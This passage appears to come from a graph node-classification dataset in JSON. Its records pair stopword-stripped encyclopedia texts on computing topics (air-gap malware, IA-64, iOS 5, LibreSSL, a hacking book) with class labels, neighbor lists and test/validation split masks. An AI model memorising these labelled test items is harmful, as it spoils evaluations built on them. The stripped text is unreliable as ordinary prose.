    "text": "Air-gap_malware:air-gap malware air-gap malware malware designed defeat air-gap isolation secure computer systems using various air-gap covert channels one techniques successfully demonstrated scientists fraunhofer society november 2013 modern computers especially laptops built-in microphones speakers air-gap malware designed communicate secure information acoustically frequencies near beyond limit human hearing technique limited computers close physical proximity also limited requirement transmitting receiving machines infected proper malware form communication link physical proximity limit overcome creating acoustically linked mesh network effective mesh network ultimately traditional ethernet connection outside world secure information removed secure facility 2014 researchers introduced ″airhopper″ bifurcated attack pattern showing feasibility data exfiltration isolated computer nearby mobile phone using fm frequency signals 2015 bitwhisper covert signaling channel air-gapped computers using thermal manipulations introduced bitwhisper supports bidirectional communication requires additional dedicated peripheral hardware later 2015 researchers introduced gsmem method exfiltrating data air-gapped computers cellular frequencies transmission generated standard internal bus renders computer small cellular transmitter antenna 2016 researchers categorized various out-of-band covert channels oob-ccs malware communication channels require specialized hardware transmitter receiver oob-ccs high-bandwidth conventional radio-frequency channels however capable leaking sensitive information require low data rates communicate e.g. text recorded audio cryptographic key material general researchers demonstrated air-gap covert channels realized number different mediums including",
    "neighbors": [
      7515,
      28,
      8574
    ],
    "mask": "Test"
  },
  {
    "node_id": 7128,
    "label": 9,
    "text": "Impromptu_(programming_environment):impromptu programming environment impromptu mac os x programming environment live coding impromptu built around scheme language member lisp family languages source code core opened extempore project environment allows make changes program runtime variables functions may redefined changes take effect immediately programmer also create schedule code future execution well data events notes graphics objects event scheduled execution continues looping performed using idiom called temporal recursion works function asynchronously schedule future call final action library allows communicating audio units audio synthesis graphics layers quicktime quartz core image opengl video composition code written objective-c called editor also objective-c frameworks perform calls scheme interpreter impromptu scheme interpreter initially built tinyscheme 1.35 baseline substantially modified since better suit live coding context real-time garbage collector objective-c integration added also new statically typed language called extempore language integrated system language syntactically scheme-like semantically closer c designed real-time sound synthesis computationally heavy tasks provides type inference compiled machine language llvm study keith live coding performance impromptu andrew sorensen first two minutes 1:56 silent performer writes program produce introduction piece modifies code fly evolve composition core impromptu released extempore bsd style licence runs linux mac os x includes scheme interpreter extempore language compiler scheduler bindings apple libraries absent environment interface dynamic libraries",
    "neighbors": [
      2304,
      9345,
      10083,
      7172,
      9783,
      6502,
      10470,
      1390,
      7983,
      7184,
      7571,
      2676,
      6933,
      823,
      7769,
      9210
    ],
    "mask": "Test"
  },
  {
    "node_id": 7129,
    "label": 7,
    "text": "Quip_(software):quip software quip collaborative productivity software suite mobile web allows groups people create edit documents spreadsheets group typically business purposes quip founded bret taylor co-creator google maps ceo friendfeed former facebook cto along kevin gibbs founded google app engine taylor founded company 2012 leaving position facebook roughly year later quip launched public mobile-centric tool creating shared notes lists documents app well-received winning accolades one best apps year time next web guardian 2015 quip announced received 30 million funding round led greylock partners july 2016 salesforce announced acquisition quip estimated total 750 million january 2017 quip acquired designer studio unity variety core quip provides word processing spreadsheet functionality accessible via web ios app android app alongside documents quip live updating history edits made well ability highlight portions document add comments facilitates collaboration 2015 quip also added standalone chat rooms",
    "neighbors": [
      10090
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7130,
    "label": 4,
    "text": "Alec_Yasinsac:alec yasinsac alec yasinsac dean school computing university south alabama united states retired u.s. marine yasinsac awarded doctoral degree 1996 university virginia doctoral advisor william wulf received master science computer science naval postgraduate school bachelor science mathematics appalachian state university yasinsac co-founder co-director security assurance information security sait laboratory visiting scholar national academy engineering nae 2006 served advisory board nae 2007 national meeting symposium electronic voting led team conducted source code review support florida department state audit florida 13th congressional district 2006 election",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7131,
    "label": 2,
    "text": "XOS_(mobile_operating_system):xos mobile operating system xos pronounced eks-oh-es customized version android mobile operating system developed mobile phone company infinix mobile ltd succeeding infinix previous operating system xui xos designed evolving creative smartphone operating system shipped infinix smart phones three distinctive features ai intelligence lightning speed customization option 50 million smartphone devices powered xos currently improved 1000 times attain 21 faster performance compared original android os xos also provides 20 apps redesigned satisfy users needs",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7132,
    "label": 3,
    "text": "Socket_940:socket 940 socket 940 940-pin socket 64-bit amd opteron server processors amd athlon 64 fx consumer processors socket entirely square shape pins arranged grid exception four key pins used align processor corners amd opteron older amd athlon 64 fx fx-51 use socket 940 microprocessors designed socket intended used server platform provide additional features provide additional robustness one feature acceptance registered memory recent 940-pin socket am2 visually similar one two electrically incompatible due integrated memory controller socket 940 cpu integrate ddr controller whereas am2 models use ddr2 controller",
    "neighbors": [
      3586,
      8322,
      3588,
      8452,
      9475,
      3464,
      4872,
      7058,
      10260,
      4246,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      2525,
      4451,
      5859,
      1260,
      7788,
      7151,
      1651
    ],
    "mask": "None"
  },
  {
    "node_id": 7133,
    "label": 2,
    "text": "IOS_5:ios 5 ios 5 fifth major release ios mobile operating system developed apple inc. successor ios 4 announced company worldwide developers conference june 6 2011 released october 12 2011 succeeded ios 6 september 19 2012. ios 5 revamped notifications adding temporary banners appear top screen introducing notification center central location recent notifications operating system also added icloud apple cloud storage service synchronization content data across icloud-enabled devices imessage apple instant messaging service first time system software updates installed wirelessly without requiring computer itunes ios 5 also featured deep integration twitter introduced multitasking gestures ipads added easily accessible camera shortcut lock screen ios 5 subject criticism iphone 4s users initial release poor battery life failures sim cards echoes phone calls problems fixed subsequent releases ios 5 introduced apple worldwide developers conference june 6 2011 beta version available developers later day ios 5 officially released october 12 2011. ios 5.0.1 released november 10 2011 first update ios 5 update included fixes battery issues ios 5.1 released march 7 2012 along new ipad retina display update included support japanese language siri redesigned camera app ipad bug fixes battery life issues ios 5.1.1 released may 7 2012 update included reliability improvements high dynamic range photos safari bookmark synchronization fixes bug fixes previous ios versions notifications popped screen dialog boxes interrupting current activity ios 5 notifications revamped show temporary banner top screen recent notifications also accessed pulling notification center top screen users prefer old notification system keep choosing appropriate option settings menu ios 5 introduces icloud apple cloud storage service new service allows users synchronize music pictures videos application data across icloud-enabled devices ios 5 enables wireless system updates supported devices meaning computer itunes n't necessary update devices activation new devices updates done wirelessly ios 5 features deep twitter integration users able sign twitter directly settings menu photos tweeted directly photos camera apps users also able tweet safari youtube google maps apps multitasking gestures debut ipad release ios 5 multitasking allows users jump apps without double-tapping home button first going home screen multitasking gestures available ipad 2 ipad keyboard could undocked bottom screen could split two half-keyboards first ios 5 release allowed camera app easily accessed lock screen first time users double-clicked home button camera icon would appear next slide unlock message users would click directly access camera ios 5.1 update streamlined process dropping home button double-click procedure requiring users swipe camera icon security purposes device locked passcode method accessing camera allows access camera app features device pressing volume-up button allows user take picture imessage new instant messaging service built messages app allowed anyone ios 5 device send basic multimedia messages anyone else compatible ios 5 device contrast sms messages sent imessage use internet rather regular cellular texting also contrast regular sms android blackberry devices compatible service imessages synchronized across user devices color-coded blue regular sms green ios mail app included rich text formatting better indent control flagging messages ability drag addresses cc bcc lines reminders allows users create lists tasks alerts either date-based location-based newsstand act native app rather special folder selected shows icons periodicals user subscribed newspapers magazines new issues downloaded automatically ipod app replaced separate music videos apps initial october 2011 release ios 5 saw significant upgrade issues errors installation apple server overload following user complaints apple officially confirmed ios 5 poor battery life iphone 4s users stated upcoming software update would fix issues ios 5.0.1 update fixed bugs related battery issues november 2011 engadget reported ios 5 update caused wi-fi connection drops users report also wrote recent ios 5.0.1 update certainly n't fixed matter either questioned whether events unrelated part larger issue users iphone 4s reported issues sim card ios 5 given error messages invalid sim sim failure apple released second software build 5.0.1 update designed fix sim card issues users iphone 4s reported random appearance echoes phone calls made earphones initial release ios 5 party call sometimes unable hear conversation due problem many aspects ios 5 received positive reviews including new notification center ability sync update wirelessly imessage richmond shane telegraph said ios 5 brilliant upgrade already brilliant operating system different people look different things mobile operating system people prefer blackberry android windows mobile value ease use attention detail design ios 5 apple continues deliver best user experience available richard goodwin know mobile said reckon ios 5 everything needs ’ wait get teeth stuck soon ’ released autumn 2011 release apple dropped support older devices specifically iphone 3g second-generation ipod touch",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      6675,
      11289,
      541,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8767,
      576,
      5696,
      8774,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      3167,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      10888,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      11430,
      3241,
      171,
      2735,
      3248,
      1715,
      4283,
      3772,
      7869,
      3790,
      7378,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      10052,
      838,
      7496,
      4957,
      6495,
      9063,
      10602,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      7057,
      3483,
      2979,
      9123,
      11171,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 7134,
    "label": 3,
    "text": "IA-64:ia-64 ia-64 also called intel itanium architecture instruction set architecture isa itanium family 64-bit intel microprocessors basic isa specification originated hewlett-packard hp evolved implemented new processor microarchitecture intel hp continued partnership expertise underlying epic design concepts order establish first new isa 20 years bring entirely new product line market intel made massive investment product definition design software development tools os software industry partnerships marketing support effort intel created largest design team history new marketing industry enabling team completely separate x86 first itanium processor codenamed merced released 2001 itanium architecture based explicit instruction-level parallelism compiler decides instructions execute parallel contrasts superscalar architectures depend processor manage instruction dependencies runtime itanium models including tukwila cores execute six instructions per clock cycle 2008 itanium fourth-most deployed microprocessor architecture enterprise-class systems behind x86-64 power isa sparc 1989 hp began become concerned reduced instruction set computing risc architectures approaching processing limit one instruction per cycle intel hp researchers exploring computer architecture options future designs separately began investigating new concept known long instruction word vliw came research yale university early 1980s vliw computer architecture concept like risc cisc single instruction word contains multiple instructions encoded one long instruction word facilitate processor executing multiple instructions clock cycle typical vliw implementations rely heavily sophisticated compilers determine compile time instructions executed time proper scheduling instructions execution also help predict direction branch operations value approach useful work fewer clock cycles simplify processor instruction scheduling branch prediction hardware requirements penalty increased processor complexity cost energy consumption exchange faster execution time hp begun believe longer cost-effective individual enterprise systems companies develop proprietary microprocessors intel also researching several architectural options going beyond x86 isa address high end enterprise server high performance computing hpc requirements thus intel hp partnered 1994 develop ia-64 isa using variation vliw design concepts intel named explicitly parallel instruction computing epic intel goal leverage expertise hp developed early vliw work along develop volume product line targeted high-end enterprise class servers high performance computing hpc systems could sold original equipment manufacturers oems hp wished able purchase off-the-shelf processors built using intel volume manufacturing leading edge process technology higher performance cost effective current pa-risc processors resulting products would intel hp would one many customers order achieve volumes necessary successful product line itanium products would required meet needs broader customer base software applications os development tools available customers required itanium products designed documented manufactured quality support consistent rest intel products therefore intel took lead microarchitecture design productization packaging test steps industry software operating system enabling linux windows nt marketing part intel definition marketing process engaged wide variety enterprise oem software os vendors well end customers order understand requirements ensure reflected product family meet needs broad range customers end-users hp made substantial contribution isa definition merced/itanium microarchitecture itanium 2 productization responsibility intel original goal delivering first itanium family product codenamed merced 1998 intel product marketing industry engagement efforts substantial achieved design wins majority enterprise server oem including based risc processors time industry analysts predicted ia-64 would dominate servers workstations high-end desktops eventually supplant risc complex instruction set computing cisc architectures general-purpose applications compaq silicon graphics decided abandon development alpha mips architectures respectively favor migrating ia-64 1997 apparent ia-64 architecture compiler much difficult implement originally thought delivery itanium began slipping since itanium first ever epic processor development effort encountered unanticipated problems team accustomed addition epic concept depends compiler capabilities never implemented research needed several groups developed operating systems architecture including microsoft windows unix unix-like systems linux hp-ux freebsd solaris tru64 unix monterey/64 last three canceled reaching market 1999 intel led formation open source industry consortium port linux ia-64 named trillium later renamed trillian due trademark issue led intel included caldera systems cern cygnus solutions hewlett-packard ibm red hat sgi suse turbolinux va linux systems result working ia-64 linux delivered ahead schedule first os run new itanium processors intel announced official name processor itanium october 4 1999 within hours name itanic coined usenet newsgroup pun name titanic unsinkable ocean liner sank maiden voyage 1912 time itanium released june 2001 performance superior competing risc cisc processors recognizing lack software could serious problem future intel made thousands early systems available independent software vendors isvs stimulate development hp intel brought next-generation itanium 2 processor market year later itanium 2 processor released 2002 relieved many performance problems original itanium processor mostly caused inefficient memory subsystem 2003 amd released opteron implemented 64-bit architecture x86-64 opteron gained rapid acceptance enterprise server space provided easy upgrade x86 intel responded implementing x86-64 em64t xeon microprocessors 2004 november 2005 major itanium server manufacturers joined intel number software vendors form itanium solutions alliance promote architecture accelerate software porting 2006 intel delivered montecito marketed itanium 2 9000 series dual-core processor roughly doubled performance decreased energy consumption 20 percent itanium 9300 series processor codenamed tukwila released 8 february 2010 greater performance memory capacity tukwila originally slated release 2007 device uses 65 nm process includes two four cores 24 mb on-die caches hyper-threading technology integrated memory controllers implements double-device data correction dddc helps fix memory errors tukwila also implements intel quickpath interconnect qpi replace itanium bus-based architecture peak interprocessor bandwidth 96 gb/s peak memory bandwidth 34 gb/s quickpath processor integrated memory controllers interfaces memory directly using qpi interfaces directly connect processors i/o hubs quickpath also used intel processors using nehalem microarchitecture making probable tukwila nehalem able use chipsets tukwila incorporates four memory controllers supports multiple ddr3 dimms via separate memory controller much like nehalem-based xeon processor code-named beckton itanium 9500 series processor codenamed poulson follow-on processor tukwila features eight cores 12-wide issue architecture multithreading enhancements new instructions take advantage parallelism especially virtualization poulson l3 cache size 32 mb l2 cache size 6 mb 512 kb 256 kb per core die size 544 mm² less predecessor tukwila 698.75 mm² isscc 2011 intel presented paper called 32nm 3.1 billion transistor 12-wide-issue itanium processor mission critical servers given intel history disclosing details itanium microprocessors isscc paper likely refers poulson analyst david kanter speculates poulson use new microarchitecture advanced form multi-threading uses many two threads improve performance single threaded multi-threaded workloads new information released hotchips conference new information presents improvements multithreading resiliency improvements instruction replay ras new instructions thread priority integer instruction cache prefetching data access hints kittson 9500 poulson slightly higher clocked january 2019 intel announced kittson would discontinued last order date january 2020 planned successor intel extensively documented itanium instruction set technical press provided overviews architecture renamed several times history hp originally called pa-wideword intel later called ia-64 itanium processor architecture ipa settling intel itanium architecture still widely referred ia-64 64-bit register-rich explicitly parallel architecture base data word 64 bits byte-addressable logical address space 2 bytes architecture implements predication speculation branch prediction uses variable-sized register windowing parameter passing mechanism also used permit parallel execution loops speculation prediction predication renaming control compiler instruction word includes extra bits approach distinguishing characteristic architecture architecture implements large number registers 128-bit instruction word called bundle contains three slots holding 41-bit instruction plus 5-bit template indicating type instruction slot types m-unit memory instructions i-unit integer alu non-alu integer long immediate extended instructions f-unit floating-point instructions b-unit branch long branch extended instructions template also encodes stops indicate data dependency exists data stop instructions pair stops constitute instruction group regardless bundling must free many types data dependencies knowledge allows processor execute instructions parallel without perform complicated data analysis since analysis already done instructions written within slot instructions predicated specifying predicate register value true false determine whether instruction executed predicated instructions always execute predicated codice_4 always reads true ia-64 assembly language instruction format deliberately designed written mainly compilers humans instructions must grouped bundles three ensuring three instructions match allowed template instructions must issue stops certain types data dependencies stops also used limited places according allowed templates fetch mechanism read two bundles per clock l1 cache pipeline compiler take maximum advantage processor execute six instructions per clock cycle processor thirty functional execution units eleven groups unit execute particular subset instruction set unit executes rate one instruction per cycle unless execution stalls waiting data units group execute identical subsets instruction set common instructions executed multiple units execution unit groups include ideally compiler often group instructions sets six execute time since floating-point units implement multiply–accumulate operation single floating point instruction perform work two instructions application requires multiply followed add common scientific processing occurs processor execute four flops per cycle example 800 mhz itanium theoretical rating 3.2 gflops fastest itanium 2 1.67 ghz rated 6.67 gflops practice processor may often underutilized slots filled useful instructions due e.g data dependencies limitations available bundle templates densest possible code requires 42.6 bits per instruction compared 32 bits per instruction traditional risc processors time no-ops due wasted slots decrease density code additional instructions speculative loads hints branches cache difficult generate optimally even modern compilers 2002 2006 itanium 2 processors shared common cache hierarchy 16 kb level 1 instruction cache 16 kb level 1 data cache l2 cache unified instruction data 256 kb level 3 cache also unified varied size 1.5 mb 24 mb 256 kb l2 cache contains sufficient logic handle semaphore operations without disturbing main arithmetic logic unit alu main memory accessed bus off-chip chipset itanium 2 bus initially called mckinley bus usually referred itanium bus speed bus increased steadily new processor releases bus transfers 2×128 bits per clock cycle 200 mhz mckinley bus transferred 6.4 gb/s 533 mhz montecito bus transfers 17.056 gb/s itanium processors released prior 2006 hardware support ia-32 architecture permit support legacy server applications performance ia-32 code much worse native code also worse performance contemporaneous x86 processors 2005 intel developed ia-32 execution layer ia-32 el software emulator provides better performance montecito intel therefore eliminated hardware support ia-32 code 2006 release montecito intel made number enhancements basic processor architecture including see chipsets ... markets",
    "neighbors": [
      10752,
      7173,
      9739,
      4108,
      4112,
      5649,
      7699,
      5655,
      10781,
      8231,
      10796,
      7218,
      2623,
      2113,
      7234,
      3142,
      3654,
      8266,
      7755,
      2638,
      10839,
      7770,
      5214,
      1119,
      1122,
      10851,
      3175,
      4204,
      8815,
      8820,
      630,
      8822,
      4217,
      5754,
      8315,
      4734,
      2693,
      6797,
      7313,
      8851,
      6804,
      6815,
      8352,
      1185,
      5793,
      6818,
      6821,
      7852,
      9391,
      7858,
      9911,
      8890,
      2237,
      4286,
      5309,
      2241,
      2243,
      6339,
      9932,
      5329,
      8402,
      10966,
      731,
      9436,
      11484,
      7911,
      10985,
      5356,
      9964,
      5358,
      5871,
      1776,
      8944,
      9455,
      757,
      2805,
      3317,
      8439,
      249,
      10485,
      5883,
      255,
      5380,
      1798,
      5384,
      5386,
      6926,
      6415,
      8976,
      3857,
      1298,
      5397,
      3350,
      4886,
      1304,
      3352,
      1820,
      2334,
      6950,
      295,
      5933,
      10548,
      309,
      8501,
      823,
      5948,
      4928,
      8514,
      10051,
      5444,
      3911,
      4427,
      6476,
      7505,
      9044,
      11604,
      8543,
      1376,
      8551,
      10603,
      4465,
      371,
      5492,
      1399,
      7033,
      1402,
      3966,
      5503,
      7039,
      3457,
      6529,
      3459,
      10624,
      3973,
      9095,
      9611,
      6028,
      398,
      3470,
      5523,
      9111,
      1952,
      9126,
      936,
      1964,
      10669,
      1967,
      2480,
      9135,
      11184,
      2995,
      10675,
      1461,
      1463,
      7607,
      10680,
      1469,
      4030,
      3014,
      1998,
      5073,
      466,
      11218,
      1499,
      3547,
      2525,
      1502,
      5090,
      995,
      1000,
      7657,
      4074,
      9707,
      8684,
      10733,
      10734,
      6639,
      6129,
      499,
      4596,
      9205,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 7135,
    "label": 4,
    "text": "Hacking:_The_Art_of_Exploitation:hacking art exploitation hacking art exploitation book jon smibbs erickson computer security network security published starch press 2003 second edition 2008 examples book developed compiled tested gentoo linux jon erickson computer security expert background computer science 2011 worked vulnerability researcher computer security specialist california bootable cd included book provides linux-based programming debugging environment users content exploiting moves programming networking cryptography book use notable measure real-world examples discussions rarely bring specific worms exploits computer programming portion hacking takes half book section goes development design construction testing exploit code thus involves basic assembly programming demonstrated attacks range simple buffer overflows stack complex techniques involving overwriting global offset table erickson discusses countermeasures non-executable stack evade return-to-libc attacks dive deeper matters without known guaranteed exploits address space layout randomization book also cover openwall grsecurity pax projects kernel exploits networking segment hacking explains basics osi model basic networking concepts including packet sniffing connection hijacking denial service port scanning cryptology section hacking covers basic information theory addition symmetric asymmetric encryption winds cracking wep utilizing fluhrer mantin shamir attack besides basics including man-in-the-middle attacks dictionary attacks use john ripper hacking discusses quantum key distribution lov grover quantum search algorithm peter shor quantum factoring algorithm breaking rsa encryption using large quantum computer introduction book states hacking done within confines law productive reasons programming chapter book different types programs described shown via examples chapter covers control structures basic aspects programming live cd provides environment reader follow along examples book programming exploitation taking computer code set rules changing computer want finding ways holes system change important part exploitation chapter covers exploit techniques memory corruption buffer overflows format strings especially using perl bash shellcode osi model communication among computers networking osi model used osi model model provides standards computers use communicate seven layers osi model physical layer data-link layer network layer transport layer session layer presentation layer application layer packet computer sends another computer must go layer osi model sockets standard way communicate network use computer operating systems socket socket used programmer create way send receive data using layers osi two types sockets stream socket datagram socket stream sockets use transmission control protocol tcp datagram socket uses user datagram protocol udp peeling back layers 'peeling back layers describes osi layers actually work osi model described great detail images book make easy understand network sniffing switched unswitched networks exist networking switched network uses devices called switches analyze tell packets travelling network endpoint unswitched network free flow packets without stopped analyzed sniffing refers using program allows see packets network going denial service denial service attack attempt make computer resource unavailable intended users means denial service attack sends large quantity communication requests intended resource order overflow resource becomes unusable certain period time types attacks usually directed routers firewalls order shut gain access computers network router susceptible types attacks firewall usually handle attack unaffected distributed denial service attack communication requests come multiple computers greatly increasing number requests regular denial service attack types dos attacks include ping death teardrop ping flooding amplification attacks tcp/ip hijacking tcp/ip hijacking another way uses spoofed packets take connection victim host machine technique mainly used collect passwords host machine uses password connected type attack takes place victim attacker must network another form tcp/ip hijacking rst hijacking involves injecting fake reset packet port scanning port scanning simply way figure ports accepting listening connections hacker would use program lets know ports open scanning ports network trying open many type scans syn idle fin x-mas null scans reach hack someone part finding vulnerabilities typecasting network using debugger go lines code used network protocols efficient way accomplish shellcode used exploitation code like hacker code wants run gains control program usually hacker find exploit programs code able insert code shellcode found exploit assembly vs. c assembly differs c assembly low-level programming language processed communicate directly processor using c high-level programming language code must compiled sent kernel making system call making call processor words almost like taking system calling kernel picture using assembly path shellcode part shellcode inject program shellcode taken many examples code book ways accomplish task self-spawning shellcode spawning shellcode code enabled exploit found shellcode able run vulnerability found program best way accomplish shown book making sure code small port-binding shellcode type shellcode attaches network port bound port listen tcp connection finds tcp connection lot programming involved shown vividly book connect-back shellcode type shellcode mainly used getting around firewalls firewalls going block port-binding shellcode working set allow known services active ports connect-back shellcode initiates connection back hacker ip address coming firewall instead going code book depicts connect-back use shellcode ways accomplish part book defenses intrusion prevention systems stop known hacking exploits countermeasures detect administrator network aware exploit may occurring using certain tools like reading logs packet sniffing network ways catch exploits occur system daemons system daemon server program unix system receives accepts incoming connections daemon program runs background detaches controlling terminal certain way point book code shown run daemon program signals also used unix-based environment make operating system calls signal type terminal immediately send interrupt message complete task whatever signal typed uses signals displayed coding examples book tools trade hacker certain set tools needs help exploiting exploit script tool uses already written exploit code find holes system program using exploit scripts easy even non-hacker use code already written couple exams exploit tools shown book use log files stated earlier log files way check events happening computer network hacker ability change log file says help noticed code directions change log files book overlooking obvious another sign program hacked longer work correctly time programs work correctly hacker modified accomplish another task skilled hacker however modify program still works correctly wants program exploited ways tell happened finding program exploited tedious process since usually starts taking parts program looking individually putting exploited program back together see exploited shown book advanced camouflage hacker exploiting program ip address written log file camouflaging log files ip address detected shown book ip address hidden called spoofing ip address whole infrastructure use intrusion detection systems intrusion prevention systems greatly helps avoid risk exploited even firewalls routers log files show evidence hacking making sure outbound tcp connections processed one way limit found ways shown book use tcp connections easier go undetected payload smuggling using shellcode exploit programs caught intrusion detection systems usually intrusion detection system catch programs already written noticeable shell code exploit programs caught real hackers using ways hide shellcode harder detect couple examples hide shellcode found book buffer restrictions sometimes restrictions put buffers vulnerabilities exploited ways book depicts get around buffer restrictions hardening countermeasures exploits found book around long time took hackers figured take advantage vulnerabilities described book memory corruption change control use shellcode three easiest steps exploitation nonexecutable stack applications use stack type executing one defense make stack non-executable buffer overflows used exploitation program defense effective stopping use shellcode application however way get around use non-executable stack shown described book randomized stack space randomized stack type countermeasure used hacker unable tell shellcode implemented randomizes memory layout within stack also way get around countermeasure examples book cryptology use communicating secretly use ciphers cryptanalysis process cracking deciphering secret communications chapter offers information theory cryptology including work claude shannon concepts including unconditional security one-time pads quantum key distribution computational security using key encrypt decrypt messages symmetric encryption asymmetric encryption involves using different keys public private chapter gives examples kinds encryption use cipher encryption algorithm combining use symmetric cipher asymmetric cipher called hybrid cipher ways attack ciphers get around encryption methods shown described book chapter also shows methods figure encrypted passwords including brute-force attacks hash look-ups also offers methods get around wireless 802.11b wi-fi wired equivalent privacy wep encryption",
    "neighbors": [
      5636,
      7557,
      8582,
      3473,
      8867,
      9854,
      939,
      4140,
      3629,
      10924,
      5040,
      823,
      5176,
      1474,
      4435,
      10329,
      8674,
      5363,
      5492,
      9331,
      2558,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7136,
    "label": 6,
    "text": "E2fsprogs:e2fsprogs e2fsprogs sometimes called e2fs programs set utilities maintaining ext2 ext3 ext4 file systems since file systems often default linux distributions commonly considered essential software included e2fsprogs ordered asciibetical order many utilities based codice_20 library despite name might suggest e2fsprogs works ext2 also ext3 ext4 although ext3 journaling capability reduce need use codice_7 sometimes still necessary help protect kernel bugs bad hardware ext4 e2fsck runtime come considerably userspace companion ext2 ext3 ext4 drivers linux kernel e2fsprogs commonly used gnu/linux however ported systems freebsd darwin",
    "neighbors": [
      5256,
      2197,
      5397,
      2199,
      6808,
      287,
      10016,
      9762,
      7983,
      823,
      451,
      8651,
      4815,
      7136,
      10732,
      2545,
      5106,
      8306,
      246,
      9335
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7137,
    "label": 4,
    "text": "John_A._Samford:john a. samford john alexander samford august 29 1905 – december 1 1968 lieutenant general united states air force served director national security agency samford born hagerman new mexico 1905 graduated high school 1922 spent one year columbia university new york city 1924 received senatorial appointment united states military academy graduated 1928 131st class 260 samford first assignment student officer brooks field texas 1929 received pilot wings kelly field eventually rated command pilot samford next assigned fort crockett located galveston texas 1930 returned kelly field served flying instructor 1934 ordered engineering armament school chanute field illinois 1935 1942 held various assignments panama virginia louisiana florida samford assistant chief staff g-1 headquarters third air force tampa florida appointed chief staff viii air force composite command located northern ireland 1943 samford appointed deputy chief staff eighth air force later chief staff viii bomber command 1944 samford promoted brigadier general appointed chief staff eighth air force october 1944 appointed deputy assistant chief staff a-2 headquarters u.s. army air forces january 1947 samford appointed commander 24th composite wing soon thereafter became antilles air division caribbean air command may 1949 samford appointed commandant air command staff school promoted major general 1950 held brief appointment commandant air war college appointed director intelligence united states air force samford tenure director air force intelligence project blue book investigated unidentified flying objects ufos started july 29 1952 stamford conducted press conference pentagon related ufos samford mentioned beginning 1956 film ufo examined phenomena unidentified flying objects samford served vice director national security agency june august 1956 november samford appointed director national security agency promoted lieutenant general held post retirement november 23 1960 successor nsa director admiral laurence h. frost died november 20 1968 washington dc",
    "neighbors": [
      6017,
      266,
      6668,
      9357,
      8726,
      2712,
      289,
      4898,
      1189,
      11302,
      9517,
      1838,
      1714,
      5308,
      10305,
      1986,
      327,
      6343,
      6344,
      11335,
      7119,
      7759,
      2897,
      3154,
      7887,
      8276,
      7893,
      4566,
      10832,
      6749,
      991,
      3305,
      7145,
      365,
      4719,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "Test"
  },
  {
    "node_id": 7138,
    "label": 5,
    "text": "Interarchy:interarchy interarchy ftp client macos supporting ftp sftp scp webdav amazon s3 made nolobe supports many advanced features transferring syncing managing files internet interarchy created mac programmer peter n lewis 1993 macintosh system 7 lewis went form stairways software 1995 continue development interarchy 2007 lewis sold interarchy matthew drayton nolobe continues develop interarchy day drayton employee stairways software worked developer interarchy alongside lewis since 2001 interarchy originally called anarchie archie client name changed interarchy 2000 due conflict cybersquatter",
    "neighbors": [
      6377,
      9905,
      11201,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7139,
    "label": 2,
    "text": "LibreSSL:libressl libressl open-source implementation transport layer security tls protocol implementation named secure sockets layer ssl deprecated predecessor tls support removed release 2.3.0 openbsd project forked libressl openssl 1.0.1g april 2014 response heartbleed security vulnerability goals modernizing codebase improving security applying development best practices heartbleed security vulnerability discovered openssl openbsd team audited codebase decided necessary fork openssl remove dangerous code libressl.org domain registered 11 april 2014 project announced name 22 april 2014 first week development 90,000 lines c code removed unused code removed support obsolete operating systems removed libressl initially developed intended replacement openssl openbsd 5.6 ported platforms stripped-down version library stable project seeking stable commitment external funding 17 may 2014 bob beck presented libressl first 30 days future holds 2014 bsdcan conference described progress made first month 5 june 2014 several openssl bugs became public several projects notified advance libressl theo de raadt accused openssl developers intentionally withholding information openbsd libressl 20 june 2014 google created another fork openssl called boringssl promised exchange fixes libressl google already relicensed contributions isc license requested libressl developers 21 june 2014 theo de raadt welcomed boringssl outlined plans libressl-portable starting 8 july code porting macos solaris began initial porting linux began 20 june libressl default provider tls libressl selectable provider tls changes include replacement custom memory calls ones standard library example codice_1 codice_2 codice_3 codice_4 etc. process may help later catch buffer overflow errors advanced memory analysis tools observing program crashes via aslr use nx bit stack canaries etc. fixes potential double free scenarios also cited vcs commit logs including explicit assignments null pointer values extra sanity checks also cited commit logs related ensuring length arguments unsigned-to-signed variable assignments pointer values method returns order maintain good programming practice number compiler options flags designed safety enabled default help spotting potential issues fixed earlier -wall -werror -wextra -wuninitialized also code readability updates help future contributors verifying program correctness knf white-space line-wrapping etc. modification removal unneeded method wrappers macros also help code readability auditing error i/o abstraction library references changes made ensure libressl year 2038 compatible along maintaining portability similar platforms addition codice_5 codice_6 calls added prevent compiler optimizing prevent attackers reading previously allocated memory changes help ensure proper seeding random number generator-based methods via replacements insecure seeding practices taking advantage features offered kernel natively terms notable additions made openbsd added support newer reputable algorithms chacha stream cipher poly1305 message authentication code along safer set elliptic curves brainpool curves rfc 5639 512 bits strength initial release libressl added number features chacha poly1305 algorithm brainpool anssi elliptic curves aes-gcm chacha20-poly1305 aead modes later versions added following initial release libressl disabled number features default code features later removed including kerberos us-export ciphers tls compression dtls heartbeat ssl v2 ssl v3 later versions disabled features initial release libressl removed number features deemed insecure 